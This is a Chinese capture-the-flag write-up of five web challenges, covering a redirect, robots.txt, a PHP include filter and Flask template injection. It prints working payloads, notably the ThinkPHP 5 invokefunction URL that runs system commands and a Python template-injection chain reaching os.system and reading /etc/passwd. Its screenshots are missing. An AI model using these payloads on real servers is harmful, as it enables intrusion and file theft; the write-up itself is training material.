攻防世界WEB高手进阶区第一周

Baby_web

[题目描述]想想初始页面是哪个
[题目场景]

								图 1

打开之后的界面为图1，根据题目描述，我们需要找到初始页面。可以看到这个页面的http为http://220.249.52.133:55890/1.php，然后要找到初始页面我们可以把1.php换成index.php。
即这样

但是 会发现访问之后还是会跳转到http://220.249.52.133:55890/1.php

我们可以Fn+F12得到

此时再将http://220.249.52.133:55890/1.php改为http://220.249.52.133:55890/index.php进行访问会得到

我们可以看到出现了

点击这个文件可以看到

在消息头中下拉则可以看到

Php_rce

[题目描述]暂无
[题目场景]

我们看到的是一个报错的页面，根据页面提示查找一下thinkphp5这个版本有什么漏洞以及如何进行漏洞利用。

可以看到

即在修复之前程序未对控制器进行过滤，导致攻击者可以通过引入\符号来调用任意类方法。

漏洞利用

返回到题中我们用操作系统命令对此进行查找flag文件
http://220.249.52.133:44739/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /(查找目录)得到

我们可以看到在目录中有flag文件

继续查找目录找flag文件
http://220.249.52.133:44739/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag 得到

查看flag文件中的内容
http://220.249.52.133:44739/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 得到

Ps：代码执行/命令执行（操作系统命令）/文件写入

Training-WWW-Robots

[题目描述]暂无
[题目场景]

看到这段话的第一反应是点 这个链接，但是无法访问。
然后我们看到了 ，对http://220.249.52.133:51073/robots.txt进行访问

我们可以看到

获得了robots协议

我们可以看到

直接在上述网址后加上/fl0g.php 即http://220.249.52.133:51073/robots.txt%20/fl0g.php
会报错

那么我们返回到最初的界面 对http://220.249.52.133:51073/fl0g.php进行访问
则可获得

Web_php_include

[题目描述]暂无
[题目场景]

分析代码我们可以知道page中带有php://的都会被替换成空且程序过滤掉了page=参数传入php://
我们可以看到在所给的代码中传入了一个hello，先对它进行测试
令hello=1 我们可以得到

有返回数据

我们可以利用hello这个参数来构造进行查询，首先让page参数用http伪协议访问127.0.0.1时page这个参数为真，构造page=http://127.0.0.1/?hello=

首先查询目录
即page=http://127.0.0.1/?hello=

如图所示一共获得了三个文件 我们对第一个文件进行访问即page=http://127.0.01/?hello=

Web_python_template_injection

[题目描述]暂无
[题目场景]

在url后面添加字符进行测试构造参数{{1*2}}

可以看到页面显示“2”，则应该存在模板注入

• 获取字符串的类对象 ‘’.__ class __
• 寻找基类 ‘’.__ class__.__ mro__
• 寻找可以用引用 ‘’.__ class__.__ mro__[2].__ subclasses__()
• 构造文件读取
  ‘’.__ class__.__ mro__[2].__ subclasses__()[40] (’/etc/passwd’).read()
• payload
  eg： ‘’.__ class__.__ mro__[2].__ subclasses__()[71].__ init__.__ globals__[‘os’].system(‘ls’)

第一步：{{’’.__ class__.__ mro__[2].__ subclasses__()}}得到

第二步：{{’’.__ class__.__ mro__[2].__ subclasses__()[71].__ init__.__ globals__[‘os’].listdir(’.’)}}构造payload

第三步：{{’’.__ class__.__ mro__[2].__ subclasses__ () [40] (‘fl4g’).read()}}读取文件